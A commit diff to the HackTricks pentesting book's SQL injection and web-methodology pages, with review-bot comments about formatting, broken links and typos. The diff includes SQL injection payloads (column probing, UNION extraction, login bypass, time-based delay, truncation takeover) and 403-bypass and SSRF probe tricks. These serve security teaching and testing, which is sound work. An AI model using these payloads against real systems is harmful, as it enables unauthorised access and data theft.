GitBook: [master] 2 pages modified

CPol 2021-02-10 15:13:06 +00:00 committed by gitbook-bot
parent 0189833646
commit f3258e6ecb
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 35 additions and 37 deletions

View File

@ -138,8 +138,6 @@ The best way to identify the back-end is trying to execute functions of the diff
Also, if you have access to the output of the query, you could make it **print the version of the database**.
{% hint style="info" %}
A continuation we are going to discuss different methods to exploit different kinds of SQL Injection. We will use MySQL as example.
{% endhint %}
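Review bot: the hunk shrinks this region from 8 to 6 lines while every visible line is unchanged, so only blank lines were dropped; since the region is being touched anyway, the hint text "A continuation we are going to discuss" should read "Next, we are going to discuss".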
@ -157,19 +155,19 @@ Two methods are typically used for this purpose:
Keep incrementing the number until you get a False response. Even though GROUP BY and ORDER BY have different functionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.
```text
1' ORDER BY 1--+ #True
1' ORDER BY 2--+ #True
1' ORDER BY 3--+ #True
1' ORDER BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
1' ORDER BY 1--+ #True
1' ORDER BY 2--+ #True
1' ORDER BY 3--+ #True
1' ORDER BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
```
```text
1' GROUP BY 1--+ #True
1' GROUP BY 2--+ #True
1' GROUP BY 3--+ #True
1' GROUP BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
1' GROUP BY 1--+ #True
1' GROUP BY 2--+ #True
1' GROUP BY 3--+ #True
1' GROUP BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
```
#### UNION SELECT
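Review bot: the removed and added ORDER BY and GROUP BY blocks are character-for-character identical in this view, so the change is whitespace-only and cannot be verified from the rendered diff. While here, the `#-1' UNION SELECT 1,2,3--+ True` line in each block is commented out with a leading `#`, unlike the other lines whose `#True`/`#False` annotations trail the payload; readers may take it for a comment rather than the follow-up confirmation step, so move the `#` to the trailing annotation position as on the other lines.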
@ -199,9 +197,9 @@ On the next examples we are going to retrieve the name of all the databases, the
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]
```
_There is a different way to discover this data on every different database, but it's always the same methodology._
_There is a different way to discover this data on every different database, but it's always the same methodology._
## Exploiting Error based
## Exploiting Error based
If for some reason you **cannot** see the **output** of the **query** but you can **see the error messages**, you can make this error messages to **ex-filtrate** data from the database.
Following a similar flow as in the Union Based exploitation you could manage to dump the DB.
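Review bot: the paired lines are identical apart from whitespace, so nothing substantive changes here; the unchanged context sentence "you can make this error messages to ex-filtrate data" still carries two slips ("these error messages", "exfiltrate") that are worth fixing while this region is being edited.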
@ -264,7 +262,7 @@ Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL,
## Authentication bypass
**Small list recommended**:
**Small list recommended**:
{% file src="../../.gitbook/assets/sqli-authbypass-small.txt" %}
@ -296,7 +294,7 @@ Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
```
**Recomended list**:
**Recomended list**:
You should use as username each line of the list and as password always: _**Pass1234.**_
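Review bot: the typo "Recomended" survives into the added line; spell it "Recommended" since the line is being rewritten anyway.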
@ -343,13 +341,13 @@ To do so you should try to **create a new object named as the "master object"**
If the database is vulnerable and the max number of chars for username is for example 30 and you want to impersonate the user **admin**, try to create a username called: "_admin \[30 spaces\] a_" and any password.
The database will **check** if the introduced **username** **exists** inside the database. If **not**, it will **cut** the **username** to the **max allowed number of characters** \(in this case to: "_admin \[25 spaces\]_"\) and the it will **automatically remove all the spaces at the end updating** inside the database the user "**admin**" with the **new password** \(some error could appear but it doesn't means that this hasn't worked\).
The database will **check** if the introduced **username** **exists** inside the database. If **not**, it will **cut** the **username** to the **max allowed number of characters** \(in this case to: "_admin \[25 spaces\]_"\) and the it will **automatically remove all the spaces at the end updating** inside the database the user "**admin**" with the **new password** \(some error could appear but it doesn't means that this hasn't worked\).
More info: [https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html](https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html) & [https://resources.infosecinstitute.com/sql-truncation-attack/\#gref](https://resources.infosecinstitute.com/sql-truncation-attack/#gref)
### MySQL Insert time based checking
Add as much `','',''` as you consider to exit the VALUES statement. If delay is executed, you have a SQLInjection.
Add as much `','',''` as you consider to exit the VALUES statement. If delay is executed, you have a SQLInjection.
```text
name=','');WAITFOR%20DELAY%20'0:0:5'--%20-
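Review bot: the added line still reads "and the it will" (should be "and then it will") and "it doesn't means" (should be "it doesn't mean"), both carried over from the removed line. Separately, in the unchanged context under "MySQL Insert time based checking", the payload uses `WAITFOR DELAY`, which is Microsoft SQL Server (T-SQL) syntax that MySQL does not accept; either retitle the subsection for MSSQL or give an example that uses MySQL's own delay function, otherwise a tester will read a missing delay as "not injectable" on a MySQL backend.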
@ -476,7 +474,7 @@ WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())
### WAF bypass suggester tools
{% embed url="https://github.com/m4ll0k/Atlas" %}
{% embed url="https://github.com/m4ll0k/Atlas" caption="" %}
## Other GUIDES
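Review bot: `caption=""` is an empty attribute that renders nothing; it is harmless, but either give the embed a real caption (what Atlas is for) or leave the tag as it was rather than adding an attribute with no value.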

View File

@ -1,8 +1,8 @@
# 80,443 - Pentesting Web Methodology
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, ****join the [💬](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
If you want to **share some tricks with the community** you can also submit **pull requests** to [https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks) **that will be reflected in this book.
Don't forget to** give ⭐ on the github to motivate me to continue developing this book.
## Basic Info
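Review bot: the added version of the pull-request line corrupts the link: the target becomes `https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks`, which is not a valid URL, whereas the removed line's `[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks)` was correct. The next added line now opens with "Don't forget to**", leaving an unbalanced bold marker; restore the removed wording for both lines and only strip the stray `****` runs.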
@ -58,7 +58,7 @@ whatweb -a 3 <URL> #Aggresive
webtech -u <URL>
```
Search ****for ****[**vulnerabilities of the web application** **version**](../../search-exploits.md)\*\*\*\*
Search **for** [**vulnerabilities of the web application** **version**](../../search-exploits.md)\*\*\*\*
**Check if any WAF**
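Review bot: the trailing `\*\*\*\*` after the link survives into the added line and renders as four literal asterisks; drop it. The hunk header's context line also has `#Aggresive`, which should read `#Aggressive`.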
@ -73,7 +73,7 @@ Also, the [**flags of the cookies**](../../pentesting-web/hacking-with-cookies.m
### Web tech tricks
Some **tricks** for **finding vulnerabilities** in different well known **technologies** being used:
Some **tricks** for **finding vulnerabilities** in different well known **technologies** being used:
* [**IIS tricks**](iis-internet-information-services.md)\*\*\*\*
* [**PHP \(php has a lot of interesting tricks that could be exploited\)**](php-tricks-esp/)\*\*\*\*
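Review bot: whitespace-only change on the "Some tricks" line; while here, "well known technologies" should be hyphenated "well-known", and the escaped `\*\*\*\*` tails on the IIS and PHP list items render as literal asterisks and should be removed.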
@ -184,13 +184,13 @@ Information about SSL/TLS vulnerabilities:
Launch some kind of **spider** inside the web. The goal of the spider is to **find as much paths as possible** from the tested application. Therefore, web crawling and external sources should be used to find as much valid paths as possible.
* [**gospider**](https://github.com/jaeles-project/gospider) ****\(go\): ****HTML spider, LinkFinder in JS files and external sources \(Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com\).
* [**hakrawler**](https://github.com/hakluke/hakrawler) ****\(go\): HML spider, with LinkFider for JS files and Archive.org as external source.
* [**dirhunt**](https://github.com/Nekmo/dirhunt) ****\(python\): HTML spider, also indicates "juicy files".
* [**gospider**](https://github.com/jaeles-project/gospider) **\(go\):** HTML spider, LinkFinder in JS files and external sources \(Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com\).
* [**hakrawler**](https://github.com/hakluke/hakrawler) _\*\*_\(go\): HML spider, with LinkFider for JS files and Archive.org as external source.
* [**dirhunt**](https://github.com/Nekmo/dirhunt) _\*\*_\(python\): HTML spider, also indicates "juicy files".
* [**evine** ](https://github.com/saeeddhqan/evine)\(go\): Interactive CLI HTML spider. It also searches in Archive.org
* \*\*\*\*[**meg**](https://github.com/tomnomnom/meg) \(go\): This tool isn't a spider but it can be useful. You can just indicate a file with hosts and a file with paths and meg will fetch each path on each host and save the response.
* \*\*\*\*[**urlgrab**](https://github.com/IAmStoxe/urlgrab) \(go\): HTML spider with JS rendering capabilities. However, it looks like it's unmaintained, the precompiled version is old and the current code doesn't compile
* [**gau**](https://github.com/lc/gau) ****\(go\): HTML spider that uses external providers \(wayback, otx, commoncrawl\)
* [**gau**](https://github.com/lc/gau) _\*\*_\(go\): HTML spider that uses external providers \(wayback, otx, commoncrawl\)
* [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): This script will find URLs with parameter and will list them.
* \*\*\*\*[**galer**](https://github.com/dwisiswant0/galer) \(go\): HTML spider with JS rendering capabilities.
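Review bot: replacing `****` with `_\*\*_` on the hakrawler, dirhunt and gau items makes things worse: `\*\*` is an escaped asterisk pair, so the rendered output now shows a literal `**` in italics before the language tag, whereas the gospider item correctly got `**\(go\):**`. Apply the gospider form (or a plain space) to the other three. The typos "HML spider" and "LinkFider" in the hakrawler line also persist; they should be "HTML spider" and "LinkFinder", matching the gospider line. The `\*\*\*\*` prefixes on the meg, urlgrab and galer items are the same artifact and should go.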
@ -200,7 +200,7 @@ Start **brute-forcing** from the root folder and be sure to brute-force **all**
Tools:
* **Dirb** / **Dirbuster** - Included in Kali, **old** \(and **slow**\) but functional. Allow auto-signed certificates and recursive search. Too slow compared with th other options.
* [**Dirsearch**](https://github.com/maurosoria/dirsearch) ****\(python\): It doesn't allow auto-signed certificates but **allows recursive** search.
* [**Dirsearch**](https://github.com/maurosoria/dirsearch) **\*\*\(python\): It doesn't allow auto-signed certificates but** allows recursive\*\* search.
* [**Gobuster**](https://github.com/OJ/gobuster) \(go\): It allows auto-signed certificates, it **doesn't** have **recursive** search.
* [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Fast, supports recursive search.**
* [**wfuzz**](https://github.com/xmendez/wfuzz) `wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ`
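Review bot: the bold span on the Dirsearch item is now misplaced: `**\*\*\(python\): It doesn't allow auto-signed certificates but**` bolds the whole clause, and `allows recursive\*\*` leaves the intended emphasis as literal asterisks; the removed line's `**allows recursive**` was correct. The hunk header's context also has "th other options", which should read "the other options".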
@ -210,7 +210,7 @@ Tools:
* \*\*\*\*[https://github.com/danielmiessler/RobotsDisallowed](https://github.com/danielmiessler/RobotsDisallowed) \(Very interesting\)
* [**Seclists**](https://github.com/danielmiessler/SecLists)
* [**Dirsearch**](https://github.com/maurosoria/dirsearch) ****included dictionary
* [**Dirsearch**](https://github.com/maurosoria/dirsearch) _\*\*_included dictionary
* [http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10](http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10)
* [Assetnote wordlists](https://wordlists.assetnote.io/)
* _/usr/share/wordlists/dirb/common.txt_
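Review bot: same escaped-asterisk problem on the Dirsearch wordlist item: `_\*\*_included dictionary` renders as an italic literal `**`; use `[**Dirsearch**](https://github.com/maurosoria/dirsearch) included dictionary`. The `\*\*\*\*` prefix on the RobotsDisallowed item is the same artifact.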
@ -223,10 +223,10 @@ _Note that anytime a new directory is discovered during brute-forcing or spideri
* \*\*\*\*[**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Find broken links inside HTMLs that may be prone to takeovers
* **File Backups**: Once you have found all the files, look for backups of all the executable files \("_.php_", "_.aspx_"...\). Common variations for naming a backup are: _file.ext~, \#file.ext\#, ~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old_
* **Discover new parameters**: You can use tools like ****[**Arjun**](https://github.com/s0md3v/Arjun) **and** [**Parameth**](https://github.com/maK-/parameth) to discover hidden parameters. If you can, you could try to search **hidden parameters** on each executable web file.
* **Discover new parameters**: You can use tools like **\*\*\[**Arjun**\]\(**[https://github.com/s0md3v/Arjun](https://github.com/s0md3v/Arjun)**\)** and **\[**Parameth**\]\(**[https://github.com/maK-/parameth](https://github.com/maK-/parameth)**\) to discover hidden parameters. If you can, you could try to search** hidden parameters\*\* on each executable web file.
* **Comments:** Check the comments of all the files, you can find **credentials** or **hidden functionality**.
* If you are playing **CTF**, a "common" trick is to **hide** **information** inside comments at the **right** of the **page** \(using **hundreds** of **spaces** so you don't see the data if you open the source code with the browser\). Other possibility is to use **several new lines** and **hide information** in a comment at the **bottom** of the web page.
* **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: ****[**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/dxa4481/truffleHog/)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](https://github.com/l4yton/RegHex)\*\*\*\*
* **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: **\*\*\[**keyhacks**\]\(**[https://github.com/streaak/keyhacks](https://github.com/streaak/keyhacks)**\)**, **\[**zile**\]\(**[https://github.com/xyele/zile.git](https://github.com/xyele/zile.git)**\)**, **\[**truffleHog**\]\(**[https://github.com/dxa4481/truffleHog/](https://github.com/dxa4481/truffleHog/)**\)**, **\[**SecretFinder**\]\(**[https://github.com/m4ll0k/SecretFinder](https://github.com/m4ll0k/SecretFinder)**\)**, **\[**RegHex_\*\]\(_[https://github.com/l4yton/RegHex\)\](https://github.com/l4yton/RegHex%29\)\*\*\*
* **S3 Buckets**: While spidering look if any **subdomain** or any **link** is related with some **S3 bucket**. In that case, [**check** the **permissions** of the bucket](buckets/).
### Special findings
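Review bot: both added lines break their links: escaping the brackets (`\[**Arjun**\]\(...\)`, `\[**keyhacks**\]\(...\)`) turns the Markdown link syntax into literal text, so the rendered items show bracketed names next to raw URLs, and in the API-keys line the RegHex target becomes `https://github.com/l4yton/RegHex%29\)`, which appends an encoded `)` to the URL. The removed lines linked correctly; revert both and strip only the stray `****` and trailing `\*\*\*\*`.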
@ -246,7 +246,7 @@ It could be also very useful to **parse** the **JS files** in order to search fo
Another interesting approach could be **monitoring the JS files** with a tool like [**JSMon**](https://github.com/robre/jsmon) that checks for changes.
You should also **check** if the application is using any **outdated** and **vulnerable javascript library** with: [**RetireJS**](https://github.com/retirejs/retire.js/)\*\*\*\*
If the **javascript** code is **obfuscated**, these tools could be useful:
If the **javascript** code is **obfuscated**, these tools could be useful:
* **Javascript Deobfuscator and Unpacker** \([https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/)\)
* **Javascript Beautifier** \([http://jsbeautifier.org/](https://beautifier.io/)\)
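Review bot: whitespace-only change on the "obfuscated" line. In the unchanged context below it, the "Javascript Beautifier" item shows `http://jsbeautifier.org/` as its text but links to `https://beautifier.io/`; align the two so the visible URL matches the destination.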
@ -257,7 +257,7 @@ In several occasions you will need to **understand regular expressions** used, t
#### 403 Forbidden/Basic Authentication/401 Unauthorized \(bypass\)
* Try using **different verbs** to access the file: _GET, POST, INVENTED_
* If _/path_ is blocked, try using _**/**_**%2e/**path __\(if the access is blocked by a proxy, this could bypass the protection\). Try also _/**%252e**/path_ \(double URL encode\)
* If _/path_ is blocked, try using _**/**_**%2e/**path _\_\(if the access is blocked by a proxy, this could bypass the protection\). Try also_ /**%252e**/path\_ \(double URL encode\)
* Try Unicode bypass: _/**%ef%bc%8f**path_ \(The URL encoded chars are like "/"\) so when encoded back it will be _//path_ and maybe you will have already bypassed the _/path_ name check
* Try to **stress the server** sending common GET requests \([It worked for this guy wit Facebook](https://medium.com/@amineaboud/story-of-a-weird-vulnerability-i-found-on-facebook-fc0875eb5125)\).
* **Change the protocol**: from http to https, or for https to http
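Review bot: the added `/path` bypass line mangles the emphasis: `_\_\(if the access` opens an italic span containing a literal underscore that runs all the way to `Try also_`, and the closing `path\_` leaves another literal underscore, so the double-URL-encoded variant is no longer set off as the removed line intended. Restore the removed line and just delete its stray `__` after `path`.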
@ -308,13 +308,13 @@ In several occasions you will need to **understand regular expressions** used, t
#### 502 Proxy Error
If any page **responds** with that **code**, it's probably a **bad configured proxy**. ****If you send a HTTP request like: `GET https://google.com HTTP/1.1` \(with the host header and other common headers\), the **proxy** will try to **access** _**google.com**_ and you will have found a **SSRF**.
If any page **responds** with that **code**, it's probably a **bad configured proxy**. **\*\*If you send a HTTP request like: `GET https://google.com HTTP/1.1` \(with the host header and other common headers\), the** proxy **will try to** access **\_**google.com**\_ and you will have found a** SSRF\*\*.
#### **NTLM Authentication - Info disclosure**
If the running server asking for authentication is **Windows** or you find a login asking for your **credentials** \(and asking for **domain** **name**\), you can provoke an **information disclosure**.
**Send** the **header**: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` and due to how the **NTLM authentication works**, the server will respond with internal info \(IIS version, Windows version...\) inside the header "WWW-Authenticate".
You can **automate** this using the **nmap plugin** "_http-ntlm-info.nse_".
You can **automate** this using the **nmap plugin** "_http-ntlm-info.nse_".
#### HTTP Redirect \(CTF\)
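Review bot: the added 502 line scatters the bold markers (`**\*\*If you send`, `the** proxy **will try to** access **\_**google.com**\_`, `SSRF\*\*.`), so the rendered text emphasises the wrong words and shows literal `\*\*` and `\_`; the removed line was correct apart from its leading `****`. Separately, in the unchanged NTLM context the header value is wrapped in curly quotes inside the code span (`“Authorization: NTLM ...”`), which will not be a valid header if copied verbatim; use straight quotes or drop them.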
@ -345,7 +345,7 @@ You should also check for:
### Insert into/Create Object
Check for ****[**SQL INSERT INTO Injections.**](../../pentesting-web/sql-injection/#insert-statement)\*\*\*\*
Check for **\*\*\[**SQL INSERT INTO Injections._\*\]\(../../pentesting-web/sql-injection/\#insert-statement\)\_\*\*\*
### **Upload Files**
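Review bot: the added line escapes the link brackets (`\[**SQL INSERT INTO Injections._\*\]\(...\)`), so the cross-reference to `../../pentesting-web/sql-injection/#insert-statement` no longer renders as a link and the stray `_\*\]` and `\_\*\*\*` appear as literal characters; keep the removed line's `[**SQL INSERT INTO Injections.**](../../pentesting-web/sql-injection/#insert-statement)` and only drop the trailing `\*\*\*\*`.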